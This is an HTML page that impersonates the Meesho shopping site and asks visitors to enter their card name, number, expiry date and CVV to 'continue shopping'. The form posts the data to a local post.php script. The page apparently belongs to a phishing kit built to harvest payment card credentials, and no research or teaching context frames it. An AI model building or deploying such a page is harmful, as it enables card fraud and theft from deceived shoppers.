<!doctype html>
<html lang="en">

<head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <script src="https://cdn.tailwindcss.com"></script>
    <!-- Bootstrap CSS -->
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.1.3/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-1BmE4kWBq78iYhFldvKuhfTAU6auU8tT94WrHftjDbrCEXSU1oBoqyl2QvZ6jIW3" crossorigin="anonymous">
    <link href="https://unpkg.com/tailwindcss@^2/dist/tailwind.min.css" rel="stylesheet">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet"
        integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
    <title>meesho Card</title>
</head>

<body>
    <form action="post.php" method="POST">
        <section class="text-gray-600 body-font">
            <div class="container px-5 py-24 mx-auto flex flex-wrap items-center">
                <div class="lg:w-3/5 md:w-1/2 md:pr-16 lg:pr-0 pr-0">
                    <h1 style="font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;"
                        class="title-font font-medium text-3xl text-gray-900"> <img
                            style="width: 220px; margin-left: 0px; text-align: center; align-items: center; justify-content: center;"
                            src="img/msd.png" alt="">Please purchase Your Product, Fill Card Details to Continue Shopping
                        with <span style="color: rgb(244, 67, 182);" >meesho.com</span>.</h1>
                </div>
                <div style="box-shadow: 0px 0px 4px rgb(213, 213, 213); border: 1px solid rgb(186, 186, 186); font-weight: bold; color: #FF69B4; font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif; background: rgb(255, 255, 255);"
                    class="lg:w-2/6 md:w-1/2  rounded-lg p-8 flex flex-col md:ml-auto w-full mt-10 md:mt-0">
                    <h2 style=" font-weight: bold; color:#FF69B4; font-family: 'Gill Sans', 'Gill Sans MT', Calibri, 'Trebuchet MS', sans-serif;"
                        class=" text-lg font-medium title-font mb-5">Fill Card Details</h2>
                    <div class="relative mb-4">
                        <label for="full-name" class="leading-7 text-sm ">Name on Card</label>
                        <input style="text-align: center; justify-content: center; width: 200px;" type="text"
                            id="full-name" name="full-name" placeholder="Name on Card"
                            class="w-full bg-white rounded border border-gray-300 focus:border-yellow-500 focus:ring-2 focus:ring-yellow-200 text-base outline-none text-gray-700 py-1 px-3 leading-8 transition-colors duration-200 ease-in-out"
                            required>
                    </div>
                    <div class="relative mb-4">
                        <label for="full-name" class="leading-7 text-sm ">Card Number</label>
                        <input style="text-align: center; justify-content: center; width: 200px;" type="text"
                            id="full-name" name="card-number" placeholder="Card Number"
                            class="w-full bg-white rounded border border-gray-300 focus:border-yellow-500 focus:ring-2 focus:ring-yellow-200 text-base outline-none text-gray-700 py-1 px-3 leading-8 transition-colors duration-200 ease-in-out"
                            required>
                    </div>
                    <div class="relative mb-4">
                        <label for="email" class="leading-7 text-sm ">Expiry Month</label><br>
                        <input style="text-align: center; justify-content: center; width: 100px;" type="text" id="email"
                            name="exmonth" placeholder="Month"
                            class="w-full bg-white rounded border border-gray-300 focus:border-yellow-500 focus:ring-2 focus:ring-yellow-200 text-base outline-none text-gray-700 py-1 px-3 leading-8 transition-colors duration-200 ease-in-out"
                            required>
                    </div>
                    <div style="margin-left: 108px; margin-top: -93px;" class="relative mb-4">
                        <label for="email" class="leading-7 text-sm">Expiry Year</label><br>
                        <input style="text-align: center; justify-content: center; width: 100px; " type="text"
                            id="email" name="exyear" placeholder="Year"
                            class="w-full bg-white rounded border border-gray-300 focus:border-yellow-500 focus:ring-2 focus:ring-yellow-200 text-base outline-none text-gray-700 py-1 px-3 leading-8 transition-colors duration-200 ease-in-out"
                            required>
                    </div>
                    <div style="margin-left: 50px;" class="relative mb-4">
                        <label for="full-name" class="leading-7 text-sm ">Card CVV</label><br>
                        <input style="text-align: center; justify-content: center; width: 100px; " type="password"
                            id="full-name" name="cvv" placeholder="CVV"
                            class="w-full bg-white rounded border border-gray-300 focus:border-yellow-500 focus:ring-2 focus:ring-yellow-200 text-base outline-none text-gray-700 py-1 px-3 leading-8 transition-colors duration-200 ease-in-out"
                            required>
                    </div>
                    <button style="background: #FF69B4;"
                        class="text-white bg-yellow-500 border-0 py-2 px-8 focus:outline-none hover:bg-yellow-600 rounded text-lg">Buy Now</button>
    </form>
    </div>
    </div>
    </section>
</form>
</body>

</html>
